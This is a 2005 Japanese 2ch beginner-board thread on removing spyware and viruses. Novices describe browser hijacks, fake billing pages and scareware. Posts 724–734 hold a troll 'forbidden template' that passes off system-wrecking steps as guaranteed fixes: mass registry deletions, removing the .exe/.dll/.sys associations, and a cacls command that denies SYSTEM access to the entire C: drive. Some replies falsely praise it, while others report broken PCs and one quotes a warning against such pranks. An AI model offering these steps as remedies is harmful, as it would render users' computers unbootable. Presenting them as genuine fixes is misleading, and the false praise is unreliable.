ただ、他のスレを見てこちらに誘導されてきたんだけど
スレ違いみたいですね。エロサイトだったので書いたんですけど。
あと、ありがとう。しかしすでに試したのと同じヒントですた・・…orz

623 :ひよこ名無しさん:05/02/25 04:29:14 ID:???
>>622
エロサイトでウィルス喰らったらまたおいで。

624 :ひよこ名無しさん:05/02/25 07:27:17 ID:???
ということは、>>574はワンクリック詐欺じゃないな。
入会金払っとけよ>>574

625 :ひよこ名無しさん:05/02/25 08:11:53 ID:???
>>622

ちゃんと、アップロードの日を基準に対応しているんだろうな。
パスワードはこれだけはおさえておけ。
オマイのお気に入りにしとけ。
http://nyoi-room.pandora.nu/password.html

626 :ひよこ名無しさん:05/02/25 13:50:48 ID:fbe+hqPP
スパイウェアに感染したみたいで、ウィルスバスターのオンラインスキャンを実行しようと
すると
現在のセキュリティ設定では、このページの ActiveXコントロールは実行できません
そのため、このページは正確に表示されない可能性があります。
というウィンドが開いて実行できないんですが、どうしたらいいんでしょうか?

627 :ひよこ名無しさん:05/02/25 14:01:15 ID:???
>>626
WEB設定のリセット。テンプレやれ

628 :ひよこ名無しさん:05/02/25 15:32:22 ID:JOY/jRm1
質問してもよろしいですか?

629 :ひよこ名無しさん:05/02/25 15:43:53 ID:???
>>628
してもいいけど、期待はするな。

630 :ひよこ名無しさん:05/02/25 15:53:54 ID:JOY/jRm1
僕のPCがウィルスに感染したみたいなんです
症状は、
・インターネットを立ち上げようとすると自動的に変なサイトにアクセスされてしまう
(今は親父のPCからカキコしています)
・見たこともないアイコンがデスクトップ上に出現している
などです
>>2−8は読んだのですが、言葉が難しくてよく理解できませんでした(IEとかツールとか…)
第一、今僕のPCは怖くて立ち上げることができません
感染の経緯も説明します

631 :ひよこ名無しさん:05/02/25 16:03:58 ID:???
>>630
お父さんには言えないのかい?
IEが分からないんじゃちょっとお兄さんの手には負えないな。

632 :ひよこ名無しさん:05/02/25 16:16:23 ID:JOY/jRm1
>>630も僕です。スイマセン

某アダルト系(?)の掲示板を閲覧していたところ、(未成年なのに、罰が当たったのかも…)
スレッドに貼ってあったアドレスを不用意にクリックしてしまったのが原因です
リンク先が立ち上がると同時に、僕のPCのウィルスソフトがウィルスを除去したことを知らせてきました
驚いた僕は、慌ててウィンドウを全て×印で消しました
しかしその時にはデスクトップ上に見知らぬショートカットが出現していて、
インターネットを立ち上げようとするとヤフーに繋がるはずが怪しげな海外サイトに接続されていて、
(アドレスが数字でした。IPアドレスでしたっけ?)ファイルのダウンロードを執拗に迫られました
多少記憶にあやふやな点はありますが、大体はこんな感じです
ウィルスの特徴も説明します

633 :ひよこ名無しさん:05/02/25 16:18:59 ID:???
今日の釣りのネタはこれか。うまくやれよ。

634 :ひよこ名無しさん:05/02/25 16:22:06 ID:JOY/jRm1
>>631さん
とても父には怖くて言えません
あ、IEってインターネットエクスプローラのことですか!?

635 :ひよこ名無しさん:05/02/25 16:24:49 ID:???
>>634
じゃあそのパソコンは封印してしまって二度と触らなければいいと思います

636 :ひよこ名無しさん:05/02/25 16:25:43 ID:EoyckM5V
mightymaxってなんでしょう?tt
最近ずーとたまに出で来るんですがどうすれば
削除できるのでしょうか?


637 :628:05/02/25 16:28:05 ID:JOY/jRm1
自分で何とかします、お世話になりました

638 :ひよこ名無しさん:05/02/25 16:29:29 ID:???
>>637
パパンにごめんなちゃいしちゃったほうが幸せになれるよ

639 :530:05/02/25 16:36:04 ID:vMd+VLrU
報告します。
>>16の禁断のテンプレを使ってからウイルスはまったくでなくなったのですが、
壁紙が初期化、インターネット接続の初期化、単語登録の初期化(顔文字など)
などが発生しました。
このような症状を治せないでしょうか?
よろしくお願いします。


640 :ひよこ名無しさん:05/02/25 17:11:42 ID:???
>>632
ショートカットの名前は何よ?

>>636
何かダウソしてから出るようになったのか?

641 :ひよこ名無しさん:05/02/25 18:37:23 ID:???
>>639
はい、絶対ウソだ!本当にやったなら、起動時にブルーバック画面が出て、
回復コンソールから復帰することも出来ないはずだぞ。

ウィルスが出なくなったというのも胡散臭いなあ・・・

642 :ひよこ名無しさん:05/02/25 18:43:01 ID:???
>>585遅レス
そういうことじゃなくて、禁断のテンプレの中でも、やり方が一番簡単だからじゃないかな。
>>12-13を必読すれば、どういうことになるか分かると思うんだが、初心者は
長い文章なんて読まないから引っかかるんだ。

>>632
大方「SEX」や「FREEXXX」とか「カジノ」だろうよ。

643 :ひよこ名無しさん:05/02/25 18:54:52 ID:???
>>641
相手にしてはいけない

644 :ひよこ名無しさん:05/02/25 20:01:09 ID:???
>>641
あなたはやってみたの?

645 :485:05/02/25 20:57:35 ID:1A+9Lb+j
市販のアンチウイルスソフトを使ったところ、9)が実行可能になり
症状は改善されました。
相談に乗って頂きありがとうございました。

まだ怪しいレジストリも残っているし、ソースネクスト製なので
Spy-Botが使えなくなったのは心配ですが。

646 :ひよこ名無しさん:05/02/25 21:12:59 ID:???
>>645
今はソースとBOTは競合しない
釣りか?随分と古いね

647 :ひよこ名無しさん:05/02/25 21:16:39 ID:???
>>645
http://sec.sourcenext.info/support/qa/040916_01.html

648 :485:05/02/25 21:49:37 ID:1A+9Lb+j
>>647
失礼しました。パッケージやガイド鵜呑みにしてました。

649 :ひよこ名無しさん:05/02/25 23:00:48 ID:???
http://www.zooming.biz/puni/?fd1ee3f5495b4eaddd424fa93b0c1ed19658541adb8e

650 :649です:05/02/25 23:12:18 ID:X5fwJk4L
すいません途中で送信してしまいました。
>>649のサイトの画像をクリックしてしまったところ、「利用規約を読みましたか?」といった表示が出たのですが
利用規約を読んでいないのにもかかわらず、性欲に負けて「はい」のボタンを押してしまいました。
するとIPが抜かれて、「使用料金を払わなければプロパイダに連絡して自宅に請求する」と言われました。
>>6のURLに書いてある状況とは違うのでとても不安です。料金を払わなくてはいけないのでしょうか。

651 :ひよこ名無しさん:05/02/25 23:22:03 ID:???
>>650
おれも踏んでみたが、29000円払え、と出た。
こんなの別にどーってことないが・・・

652 :ひよこ名無しさん:05/02/25 23:37:58 ID:???
>>650

>>6
サギゼロ
ttp://sagi-0.bne.jp/pc/ --- ここの「よくある相談集」を。

によると、
>電話会社やプロバイダーは原則として個人情報の開示を行うことはありません
とのこと

653 :PC初心者板”管理”運営責任者 ◆C3hGF5scDA :05/02/26 01:27:44 ID:???
                   _ , -―-、
              , 'ニニニ、::::(0::::::::::ヽ、
                ̄ ̄ヽ':::::::::::::::  ヾ みてごらん>>649を あれが厨房だよ
                   ):::  ....   \
                  /    ::::::::::::::::::ヽ
                  /      :::::::::::::::::|
                 /       :::::::::::::::::|
                 /        :::::::::::::::::::|
                /        ::::::::::::::::::::|
                |         :::::::::::::::::::::|
               . |         :::::::::::::::::::::|
          _ , ―-、|         /::::::::::::::/::::|
          \ヲ'⌒ヽ:|         /:::::::::::::::/::::::|
            ト`_ ノ::|        /:::::::::::::/::::::::|
           人;;;;;;;::::;:|        |:::::::::::::/::::::::/
          /γ  `:::::|       |::::::::::::/::::::::/
          / (  ヽ   :::|       |:::::::::/::::::::/   ふーん、なんだか
         {  }  }  ::|       |::::::::{::::::::/    生きてる価値なさそうだね、ぱぱ
          | /   }   ::|       .ヽ::::|:::::::/
          } {  /   ::|       .ヽノ ::::/
          } |  (    :λ         :::|
         ( ヽ、 )    ノヽ        ::::|
          ヽ,   ~    〈  ト、_  |    ::::::ヽ、
          (     ,' ノ  |   |~7  ::::::::::::::`ヽ、
           ヽ,、,、,γ' ノ, -‐W~フ {  ト、:::::::::::::::::::ヽ、
          ∠____ト-┘z__,―' ̄Σ Z  ̄ヽ―-、_ノ
                    '―z_,┴'~

654 :ひよこ名無しさん:05/02/26 03:20:01 ID:???
http://news18.2ch.net/test/read.cgi/news7/1092227664/

ココの345のカキコ見れ
初心者厨房
このテンプレどうりにしろ
(絶対に禁断のテンプレはするな)
とりあえずADは入れろ
ノートンも

655 :ひよこ名無しさん:05/02/26 03:34:10 ID:???
すでに騙されてるのでスレタイがポップアップする件について

656 :ひよこ名無しさん:05/02/26 04:20:22 ID:???
なーんか1人のおかげで気持ちの悪いスレに変貌したな。
IDありで助けてと言ってsageでそれに回答してる奴がいたり。
昔の正常なスレの勢いとはかけ離れてる。

657 :ひよこ名無しさん:05/02/26 06:03:39 ID:mYy3ncbE
2chにあった、あるサイトを見たらオカシクなりました
ホームが変えられ、数分間ネット接続してると自動的にそのサイトが開かれます
PC初心者なのでどうしたらいいのか全く分かりません・・・
助けてください、お願いします。

658 :ひよこ名無しさん:05/02/26 06:18:07 ID:???
>>657
恐らくダークロリータ


携帯からは見られないと思うが
対処法
ttp://foffo-gunkanmaki.hp.infoseek.co.jp/mini/20040901.html

659 :657:05/02/26 06:26:38 ID:mYy3ncbE
なんかもうPCを起動する度に起動します。。。
>>658
それは開いても大丈夫ですよね・・・?

660 :ひよこ名無しさん:05/02/26 06:30:27 ID:???
>>659
大丈夫

661 :ひよこ名無しさん:05/02/26 06:31:03 ID:???
>>659
頼むからさぁ>>1-8読んでやり終えるまで書かないでもらえるかな?
誰のために書いてあるのさ。

662 :657:05/02/26 06:35:36 ID:mYy3ncbE
>>660-661
ありがとうございます
やってみなす

663 :ひよこ名無しさん:05/02/26 09:33:04 ID:a+3nEO3N
初心者総合質問スレから誘導されてきました

今PCをつけてたんですがしばらくしてフォルダを開いたら画面が 
http://whitevision.hp.infoseek.co.jp/cgi-bin/imgboard/img-box/img20050226090316.jpg 
こうなったり、 
ブラウザのバーや右クリックのメニューが 
http://whitevision.hp.infoseek.co.jp/cgi-bin/imgboard/img-box/img20050226090328.jpg 
こんなカンジになります。 
ウイルスバスターもアップデートしてるしスパイブラスターもつけてるんですがなんか対処法ないですかね? 
再起動は何回もしました。
smss.exeとlsass.exeと怪しげなプロセスが起動してるんですがこのせいでしょうか。
とりあえずウイルススキャン中です

664 :ひよこ名無しさん:05/02/26 09:34:38 ID:???
>663
ってことは心当たりあるのか…。

665 :ひよこ名無しさん:05/02/26 09:36:26 ID:a+3nEO3N
いやそれがないんです。
今なんとなくプロセス見たらあったんでこれかなぁと思っただけでして・・。
ぐぐったらウイルス関係のサイトも出てきましたし。
だけど↑の画像のような症状が出るって事はどこにも書いてないんですよね。

666 :ひよこ名無しさん:05/02/26 09:50:01 ID:a+3nEO3N
http://whitevision.hp.infoseek.co.jp/cgi-bin/imgboard/img-box/img20050226094904.jpg
画像追加

667 :ひよこ名無しさん:05/02/26 09:59:20 ID:a+3nEO3N
ウイルススキャン終わりました。
感染はなかったようです

668 :ひよこ名無しさん:05/02/26 10:02:20 ID:???
>>667
質問はテンプレに一通り目を通してから
最低限やってもらわなきゃ原因を絞れない
どうせ、スパイウェアが悪さしている

669 :ひよこ名無しさん:05/02/26 10:04:10 ID:???
>>665
とんちんかんなことやるよりもテンプレを一通りやったほうがはやいんだよ。

670 :ひよこ名無しさん:05/02/26 10:04:13 ID:???
>>667
スキャンディスク

671 :ひよこ名無しさん:05/02/26 10:05:02 ID:???
画像重くて見れねえ

672 :ひよこ名無しさん:05/02/26 10:07:34 ID:a+3nEO3N
spybot ad-awareともにアップデートしてスキャンしましたが見つかりませんでした

673 :ひよこ名無しさん:05/02/26 10:09:46 ID:???
>>663
つーかjpgのうしろに半角スペース入ってるからJaneからは見られない。
>>666のは何が変なのかいまいちわからない。タスクバーのところか。

674 :ひよこ名無しさん:05/02/26 10:18:42 ID:a+3nEO3N
>>673
右クリックのメニューの文字が見えないんです。
カーソルを合わせると見えるようになるんですけど。
とりあえず今ペンダーでスキャン中です。

675 :ひよこ名無しさん:05/02/26 10:19:38 ID:???
工エエェェ(´д`)ェェエエ工

676 :ひよこ名無しさん:05/02/26 10:21:40 ID:???
  |         |  |
  |         |  |_____
  |         |  | ̄ ̄ ̄ /|
  |         |  |   / /|
  |        /\ |  /|/|/|
  |      /  / |// / /|
  |   /  / |_|/|/|/|/|
  |  /  /  |文|/ // /     ∧∧
  |/  /.  _.| ̄|/|/|/      /⌒ヽ)
/|\/  / /  |/ /       [ 祭 _]    ∧∧
/|    / /  /ヽ         三____|∪   /⌒ヽ)
  |   | ̄|  | |ヽ/l         (/~ ∪    [ 祭 _]
  |   |  |/| |__|/       三三      三___|∪
  |   |/|  |/         三三       (/~∪
  |   |  |/         三三      三三
  |   |/                    三三
  |  /                    三三
  |/                    三三

677 :ひよこ名無しさん:05/02/26 10:26:18 ID:a+3nEO3N
え?なんで?

678 :ひよこ名無しさん:05/02/26 10:29:04 ID:???
気にするな

679 :ひよこ名無しさん:05/02/26 10:30:02 ID:???
>>676
今日のお祭り会場はここじゃないですよ
移動しる

H-IIAロケット7号機打ち上げをインターネット中継★2
http://live14.2ch.net/test/read.cgi/liveplus/1109289386/

680 :ひよこ名無しさん:05/02/26 10:30:43 ID:???
スパイウェアとは違うな

681 :ひよこ名無しさん:05/02/26 10:31:48 ID:???
>>680
おい!!

682 :ひよこ名無しさん:05/02/26 10:36:25 ID:???
>>677

       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧ 
    /       ̄ ̄ ̄    ヽ  
   /:::::::::              .\  スパイウェアだ信じろ・・・・・・・・・・・・
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /

683 :ひよこ名無しさん:05/02/26 10:37:22 ID:a+3nEO3N
100%スパイウェアじゃありません

684 :ひよこ名無しさん:05/02/26 10:38:24 ID:???
>>679
成功するかな?

685 :ひよこ名無しさん:05/02/26 10:40:02 ID:???
>>683
ここはスパイウェア駆除スレですよ。

686 :ひよこ名無しさん:05/02/26 10:58:16 ID:???
で、解決したのか

687 :ひよこ名無しさん:05/02/26 11:01:58 ID:a+3nEO3N
まだです。ペンダーってウイルススキャンしてくれないのかな

688 :ひよこ名無しさん:05/02/26 11:07:28 ID:T5l/dgBv
ぼくはツールバーが時々消えたり、「A」とか書いてあるボタンがなくなったりして
時々ログオフしたら戻ったりするのですよ。
あと、ボタン押してもボタンがへこんでなっかったり、
でも、ボタン押したのは、だいたい動作しているのですよ。
これはログオフしても、ほとんどもどらないのです。
どのようにしたらそういうものが直るのですか、教えてください。


689 :ひよこ名無しさん:05/02/26 11:14:43 ID:???
>>688
あはは マルチしてやがるの

690 :ひよこ名無しさん:05/02/26 11:16:01 ID:???
「A」とか書いてあるボタン

691 :ひよこ名無しさん:05/02/26 11:17:06 ID:???
>>687
何しに来たの?

692 :ひよこ名無しさん:05/02/26 11:18:09 ID:a+3nEO3N
でやっぱりここのスレの人は原因わかりませんよね?

693 :ひよこ名無しさん:05/02/26 11:19:41 ID:???
何が?おまえ何か変だよ

694 :ひよこ名無しさん:05/02/26 11:20:03 ID:???
スキャンディスクしてみ

695 :ひよこ名無しさん:05/02/26 11:20:24 ID:???
ID:a+3nEO3Nがこのスレに常駐している件について
何でここにいるのかわからない

696 :ひよこ名無しさん:05/02/26 11:21:49 ID:???
>>692
       ∧         ∧
        / ヽ        ./ .∧
     /   `、     /   ∧ 
    /       ̄ ̄ ̄    ヽ  
   /:::::::::              .\  ウイルスだ信じろ・・・・・・・・・・・・
  /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/           ∧
  ヽ:::::::::::    \___/   / ヽ          / ヽ
    ヽ::::::::::::::    \/    /   ヽ_____/  ヽ
  /            /                \
 |            /                   ヽ
 |            '''''"´)   ●   \─/  ●   |'´)
  \           -‐´         ヽ/       /´
   |       |   \                  /


697 :ひよこ名無しさん:05/02/26 11:22:34 ID:???
>>692
テンプレ全部やってこい。嫌ならリカバリー

698 :ひよこ名無しさん:05/02/26 11:53:43 ID:a+3nEO3N
いや誘導されてきたもんで。
>>697
リカバリーてHDDきえましたっけ?

699 :ひよこ名無しさん:05/02/26 12:00:01 ID:???
>>698
リカバリーソフトはセクタ転送だから何も残らないね

700 :ひよこ名無しさん:05/02/26 12:07:24 ID:???
>>698
レジストリのハイブが壊れているかディスクに異常があるかウイルスかと言ったところだよ。
スキャンディスクというレスがあるけどやる意味がある。そのあとにデフラグでもやるんだな。スレ違いで答えてくれた人を
無視するのはよくないぞ。それとHDDはハードな物体だ。消えるわけもない。

701 :ひよこ名無しさん:05/02/26 12:07:56 ID:a+3nEO3N
お前らに謝りたいことがある。
再起動してエラーチェックしたら直った。
ホントごめんマジごめん

702 :ひよこ名無しさん:05/02/26 12:08:22 ID:???
中身のデータが消える。

703 :ひよこ名無しさん:05/02/26 12:09:49 ID:???
スレ違いな質問によくがんばった。感動した。

>>701
( ´_ゝ`)

704 :ひよこ名無しさん:05/02/26 12:10:21 ID:???
>>701
>>674の時点でわかってたよw

705 :ひよこ名無しさん:05/02/26 12:10:45 ID:???
>>701
お前らだと?

706 :ひよこ名無しさん:05/02/26 12:11:46 ID:a+3nEO3N
これにて


〜〜〜Fin〜〜〜

707 :ひよこ名無しさん:05/02/26 12:12:01 ID:???
>>701
罰としておっぱいうpしる

708 :ひよこ名無しさん:05/02/26 12:15:06 ID:a+3nEO3N
男だよ

709 :ひよこ名無しさん:05/02/26 12:15:36 ID:???
>>708

    〃                 i,        ,. -‐
   r'   ィ=ゝー-、-、、r=‐ヮォ.〈    /
    !  :l      ,リ|}    |. }   /   .や
.   {.   |          ′    | }    l
    レ-、{∠ニ'==ァ   、==ニゞ<    |    ら
    !∩|.}. '"旬゙`   ./''旬 ` f^|    |
   l(( ゙′` ̄'"   f::` ̄  |l.|   |     な
.    ヽ.ヽ        {:.    lリ     |
.    }.iーi       ^ r'    ,'    ノ    い
     !| ヽ.   ー===-   /    ⌒ヽ
.   /}   \    ー‐   ,イ       l    か
 __/ ‖  .  ヽ、_!__/:::|\       ヽ

710 :ひよこ名無しさん:05/02/26 13:09:50 ID:???
スパイウェアに感染してしまったようなのですが対処法に困ってます。
テンプレにある通り、システムの復元やIEのリセットと試してみたのですが一向に治りません。
CWシュレッダーは起動しないです。
Ad-Awareを使ってみたのですが、何度やってもクリティカルオブジェクトが出てきてしまいます。

症状はブラウザを違うページに変えられたり国際電話をかけようとしたりします。電話はダイアルアップチェッカーで切ってます。
他にも画面右下にサーチ・ザ・ウェブという横長のウィンドウが出たり入ったり、
Evidence Eraser、PopUp Brocker Stops PopUps、Spyware Avenger、Your Platinum Visa
といったアイコンを勝手に作ったりします。

こいつが何と言うスパイウェアでどうやったら駆除できるのか分かりません。
力を貸してください。お願いします。

711 :710:05/02/26 13:10:55 ID:wI72TrLt
すみません。sageてしまいました。

712 :ひよこ名無しさん:05/02/26 13:18:53 ID:???
リカバリーが最良と思われます。

713 :ひよこ名無しさん:05/02/26 13:21:27 ID:???
>>710
http://www.higaitaisaku.com/removecws.html
実行時にエラーが出る場合
CoolWebShredderを立ち上げるとすぐに終了してしまう場合
はやってみたの?

714 :ひよこ名無しさん:05/02/26 13:26:33 ID:???
>>711
テンプレにあることをすべてやる。
理解不足で間違ったことをやれば直らないかもしれない。
症状が1つだけじゃないみたいなので真面目に3日ぐらい
かけるつもりでやれば直るかも知れない。

715 :ひよこ名無しさん:05/02/26 13:54:37 ID:???
>>711
最強のテンプレ>>17はやったのか?

716 :710:05/02/26 13:56:47 ID:wI72TrLt
>>712
どうやれば出来るんでしょうか?
>>713
やってみたのですが、解決しません。
>>714
難しくて分からない部分が多いのです。
それでできたらピンポイントで対処法を教えてもらおうときました。

もうちょっとサイトを見ながら自力でやってみます。
あと、スパイボットサーチアンドデストロイを新しくして使ってみたところ
クールサーチウェブを始めとして、いくつか引っ掛かったのですがやはり消えませんでした。

717 :ひよこ名無しさん:05/02/26 14:00:33 ID:???
>>716
駆除ツールはアップデート済んだらセーフモードで動かして

718 :ひよこ名無しさん:05/02/26 14:06:48 ID:???
>>716
テンプレの>>17を実行してください。

719 :ひよこ名無しさん:05/02/26 14:07:47 ID:???

































720 :710:05/02/26 15:26:48 ID:nh3xGjZU
>>717
分かりました。

あと、こんなのがデスクトップの壁紙と入れ替わってたのですが大丈夫でしょうか?

ALL YOU DO WITH COMPUTER IS STORED FOREVER IN YOUR HARD DISK. WHEN YOU VISIT SITES,
SEND EMAILS... ALL YOUR ACTIONS ARE LOGGED. AND IT IS IMPOSSIBLE TO REMOVE THEM WITH STANDARD TOOLS. YOUR DATA IS STILL AVAILABLE FOR FORENSICS. AND IN SOME CASES FOR YOUR BOSS,
YOUR FRIENDS, YOUR WIFE, YOUR CHILDREN.

Every site you or somebody or even something, like spyware, opened in your browser,
with all images, and all downloaded and maybe later removed movies or mp3 songs - ARE STILL THERE and could broke your life!


SECURE YOURSELF RIGHT NOW!


721 :ひよこ名無しさん:05/02/26 15:45:07 ID:???
ま、何も動かせなくなったとかじゃないんだから
地道にテンプレの作業やるしかないな‥

722 :ひよこ名無しさん:05/02/26 16:06:15 ID:???
>>720
これでは?
ttp://dynabook.com/assistpc/faq/pcdata/002903.htm

723 :710:05/02/26 16:24:39 ID:eJUQJmSx
>>721
そうですね。自業自得だし、勉強しながら何とか解決しようと思います。
それに少しパニくってた気がします。
>>722
それでした。わざわざありがとうございます。

724 :THE・禁断のテンプレ(ファイナル.Ver):05/02/26 18:05:45 ID:???
THE・禁断のテンプレ(ファイナル.Ver)を始める前に(重要)

この説明文を最後まで良く読んでから実行して下さい。
読まずに実行した場合は、使用許諾書を読まずに「同意する」をクリックして、
自分の意志でスパイウェアをPC内にインストールしてしまうのと同じことです。
ウィルスやスパイウェアに感染してしまった場合、それらのものによる
症状を完全に直すにはOSを再インストールすることです。
OSを再インストールすると、HDD内のデータが全て消えますが症状は完全に直ります。
(OSの再インストールにはProductKeyが必要になります。)

ですが、OSを再インストールさせずに完全に症状を直す方法があります。
それが、THE・禁断のテンプレ(ファイナル.Ver)です。
THE・禁断のテンプレ(ファイナル.Ver)を実行する前に、
必ず次の「THE・禁断のテンプレ(ファイナル.Ver)とは?」を良く読み、
内容をご理解できたならTHE・禁断のテンプレ(ファイナル.Ver)を実行して下さい。

注*「THE・禁断のテンプレ(ファイナル.Ver)とは?」を、
読まずに実行してしまうと、深刻な問題が発生する事があります。
最悪の場合、オペレーティングシステムの再インストールが必要になります。

725 :THE・禁断のテンプレ(ファイナル.Ver)とは?:05/02/26 18:06:27 ID:???
現在のウィルスやスパイウェアというものは、とてもタチが悪くて
「緊急処置」や「パソコンのトラブル解消法」では
それらの活動を完全に停止させることができない場合もあります。
それらはあくまでも、2004年12月現在までに確認されている
既知のウィルス・スパイウェアに有効な手段です。
2005年1月以降に発生した、またはこれから発生する新種や未知の
ウィルスやスパイウェアは、「緊急処置」でも「パソコンのトラブル解消法」でも、
それらの活動を完全に停止させることができず、頭の痛い日々が続いていました。
そこで、天才であるこの私は、究極の解決方法をあみ出しました。それが、
「パソコンのトラブル解消法・改」と「真・パソコンのトラブル解消法」と
「禁断のパソコンのトラブル解消法」なのです。
つまり、THE・禁断のテンプレ(ファイナル.Ver)の目的は、
ウィルスおよびスパイウェアの活動を完全に止めてしまうことです。
(本当に(PCが起動しなくなるので)ウィルス・スパイウェアの活動が停止します)
設定を完全に有効にする場合は必ずPCを再起動させて下さい。

では、THE・禁断のテンプレ(ファイナル.Ver)を実行して下さい。

726 :時間が無くてもこれだけはやっとけ:05/02/26 18:07:02 ID:???
緊急処置(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

以下のキーを削除(無い物は無視して構わない)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

作業終了→PCを通常モードで再起動

緊急処置完了!
(これをやれば症状は多少改善されると思いますが、もしも症状が
改善されないようでしたら、次の「パソコンのトラブル解消法」を実行して下さい)

727 :ウィルス・スパイウェアが見つかったら:05/02/26 18:07:50 ID:???
パソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

編集→検索をクリックして、以下の文字を検索
explorerないしkernel32

検索しながら見つかったものを片っ端から削除

検索が終わったらPCを通常モードで再起動

問題解決→ウマー(・∀・)
(それでも直らない場合は、次の「パソコンのトラブル解消法・改」か、
その次の「真・パソコンのトラブル解消法」を実行して下さい)

728 :ひよこ名無しさん:05/02/26 18:08:40 ID:???
(´・ω・`)知らんがな

729 :それでも直らない(パターンA):05/02/26 18:09:04 ID:???
パソコンのトラブル解消法・改(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

cacls c:\ /t /e /p system:nと入力してOKをクリック
(エラーになる場合は、cacls c:\ /g system:f→cacls c:\ /t /e /p system:n)

作業終了→PCを通常モードで再起動

問題解決(100%解決)→ ウマー(^∀^)
(この方法を使えば、どんなウィルスだろうがスパイウェアだろうが
悪質なプログラムは完全に停止します)

730 :それでも直らない(パターンB):05/02/26 18:09:45 ID:???
真・パソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

以下のキーを削除
HKEY_CLASSES_ROOT\.dll
HKEY_CLASSES_ROOT\.exe
HKEY_CLASSES_ROOT\.sys
HKEY_CLASSES_ROOT\dllfile
HKEY_CLASSES_ROOT\exefile
HKEY_CLASSES_ROOT\sysfile
HKEY_LOCAL_MACHINE\Software\CLASSES\.dll
HKEY_LOCAL_MACHINE\Software\CLASSES\.exe
HKEY_LOCAL_MACHINE\Software\CLASSES\.sys
HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile
HKEY_LOCAL_MACHINE\Software\CLASSES\exefile
HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile
(dllはウィルス・exeはトロイ/ワーム・sysはスパイウェア)

作業終了→PCを通常モードで再起動

問題解決(100%解決)→ ウマー(^∀^)
(この方法を使えば、どんなウィルスだろうがスパイウェアだろうが
悪質なプログラムは完全に停止します)

731 :ひよこ名無しさん:05/02/26 18:10:16 ID:???
>>726-729
パソコンが起動しなくなりました。orz

732 :ひよこ名無しさん:05/02/26 18:10:52 ID:???
>>730
パソコンがぶっこわれました。orz

733 :最後の手段:05/02/26 18:11:03 ID:???
禁断のパソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

編集→検索をクリックして、以下の文字を検索
registryないしoperatingsystem

見つかったものを全て削除→PCを通常モードで再起動

問題解決(絶大なる効果です)→ウマ━━━\v(^∀^)v/━━━!!
(この最後の手段は、窮地に陥った時の手段として実行して下さい!)

734 :ワンポイント・アドバイス:05/02/26 18:11:56 ID:???
PCをセーフモードで起動します

緊急処置()、パソコンのトラブル解消法()、パソコンのトラブル解消法・改()、
真・パソコンのトラブル解消法()、禁断のパソコンのトラブル解消法()を
一度に全部実行→PCを通常モードで再起動

問題解決(絶大なる効果です)→ウマ━━━\v(^∀^)v/━━━!!
(禁断のパソコンのトラブル解消法よりも効果を発揮しますが、
これを実行するまでも無く、あなたのPCの問題は解決しているでしょう)

†THE・禁断のテンプレ(ファイナル.Ver)終了†

735 :ひよこ名無しさん:05/02/26 18:12:26 ID:???
>>8
> ●アドバイスを装った悪質ないたずらにご用心
> 「パソコンのトラブル解消法」などと称して、
> レジストリやシステムファイルの削除を勧める人がいます。
> 間違ってそれらを削除するとPCが起動できなくなってしまう恐れがあります。
> もしもそのようなアドバイスをされた時は、その後のレスなどにも注意して、
> 十分よく考えて慎重に行動して下さい。

736 :ひよこ名無しさん:05/02/26 18:13:53 ID:???
すげーよ禁断のテンプレ>>731で直ったよ
ありがとう(T_T)

737 :ひよこ名無しさん:05/02/26 18:14:43 ID:???
>>733
パソコンが暴走しますた。orz

738 :ひよこ名無しさん:05/02/26 18:15:27 ID:???
また発作か

739 :ひよこ名無しさん:05/02/26 18:17:48 ID:???
>>724-727 >>729-730 >>733-734 あなたは救いの神です。
>>733までやっても直らなかったウィルスも>>734をやったら直りました。

>>728
知ってたほうが得するぞ。

>>731-732
そうしてウソをつくのですか?ちゃんと起動できますよ。
どうせ間違ってシステムファイルを消しちゃったんだ。

740 :ひよこ名無しさん:05/02/26 18:19:11 ID:???
>>739
ソースきぼん

741 :ひよこ名無しさん:05/02/26 18:20:06 ID:???
>>735=8
こらっウソを付くんじゃないよ!
人さまにウソをついちゃだめって先生に言われたでしょ。

でもパソコンのトラブル解消法ってすごいよすげーよ。
俺のPCのスパイも消えたんだぞ。

